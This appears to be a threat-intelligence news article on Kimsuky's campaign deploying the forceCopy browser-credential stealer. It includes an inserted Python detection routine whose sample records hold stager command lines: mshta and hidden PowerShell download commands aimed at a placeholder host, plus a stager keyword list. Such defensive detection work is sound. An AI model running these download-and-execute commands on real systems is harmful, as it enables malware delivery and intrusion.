North Korean APT Kimsuky Deploys forceCopy Malware to Steal Browser Credentials


The North Korean state-sponsored hacking group Kimsuky has been actively launching spear-phishing campaigns to distribute a powerful information-stealing malware dubbed forceCopy, according to the latest research from the AhnLab Security Intelligence Center (ASEC).


How Kimsuky Executes the Attack

The attack chain begins with phishing emails containing a malicious Windows shortcut (LNK) file, disguised as a Microsoft Office or PDF document. Once opened, it triggers the execution of PowerShell or mshta.exe—a legitimate Windows binary that runs HTML Application (HTA) files—which subsequently downloads and executes next-stage payloads from an external server.
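As an added defender-side example, not code from ASEC or from this article: a small Python triage routine run over constructed Sysmon-style process-creation records, flagging the user-launched mshta.exe/PowerShell download step described above while ignoring benign launches of the same binaries. The field names, the sample command lines, the 203.0.113.x addresses and the hint list are assumptions made for the example.

```python
from __future__ import annotations
import re
from pathlib import PureWindowsPath

# Living-off-the-land binaries named in the reported chain.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Assumed command-line fragments typical of a download-and-run stager.
STAGER_HINTS = ("-w hidden", "-windowstyle hidden", "downloadstring",
                "invoke-webrequest", "iwr ", "-enc", "-encodedcommand")

# Constructed sample records (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://203.0.113.5/update.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -c "Invoke-WebRequest http://203.0.113.5/a.ps1 -OutFile a.ps1"'},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -c Get-Help Get-Process"},
]

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def score_event(ev: dict) -> list[str]:
    """Return the reasons an event resembles the LNK -> mshta/PowerShell stager step."""
    if basename(ev["Image"]) not in LOLBINS:
        return []
    cmd = ev["CommandLine"].lower()
    hints = [h for h in STAGER_HINTS if h in cmd]
    has_url = bool(URL_RE.search(cmd))
    # Require a download/stager signal, not merely a LOLBin launch, to limit noise.
    if not (has_url or hints):
        return []
    reasons = []
    if basename(ev["ParentImage"]) == "explorer.exe":
        reasons.append("user-launched (explorer.exe parent, consistent with a double-clicked LNK)")
    if has_url:
        reasons.append("remote URL passed on the command line")
    if hints:
        reasons.append("stager-style flags: " + ", ".join(hints))
    return reasons

def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event worth an analyst's look."""
    return [(i, r) for i, ev in enumerate(events) if (r := score_event(ev))]
```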


Malware Deployed in the Attack

According to ASEC, Kimsuky’s attack ultimately results in the deployment of:

  • PEBBLEDASH – A well-known trojan used for remote access and data exfiltration.

  • RDP Wrapper – A customized open-source Remote Desktop tool that enables unauthorized remote access.

  • Proxy malware – Facilitates persistent RDP-based communications between infected systems and external servers.

  • PowerShell-based keylogger – Captures keystrokes to steal sensitive information.

  • forceCopy malware – A stealer designed to extract and copy files stored in web browser-related directories.


forceCopy: A Browser Credential Theft Tool

forceCopy specifically targets web browser installation paths, allowing the malware to bypass environmental restrictions and extract stored configuration files, including saved credentials. This shift in tactics underscores Kimsuky’s ongoing adaptation in evading detection and security barriers.


Kimsuky’s Tactical Evolution

By leveraging RDP Wrapper and proxy malware, Kimsuky demonstrates a shift from using traditional bespoke backdoors to more versatile remote access methods. This strategic change enhances their persistence within compromised environments.


Who is Kimsuky?

Also known as APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima, Kimsuky is linked to North Korea’s Reconnaissance General Bureau (RGB)—the nation’s primary foreign intelligence service.


Active since at least 2012, the threat actor specializes in social engineering attacks, often bypassing email security protections. In December 2024, cybersecurity firm Genians reported that Kimsuky had launched phishing campaigns originating from Russian services to conduct credential theft.


Final Thoughts

Kimsuky continues to refine its cyber espionage tactics, utilizing sophisticated phishing techniques, custom malware, and remote access tools to infiltrate and steal sensitive data. As the group evolves, organizations must strengthen their cybersecurity defenses, employ advanced threat detection, and implement multi-factor authentication (MFA) to mitigate the risks posed by these nation-state cyber threats.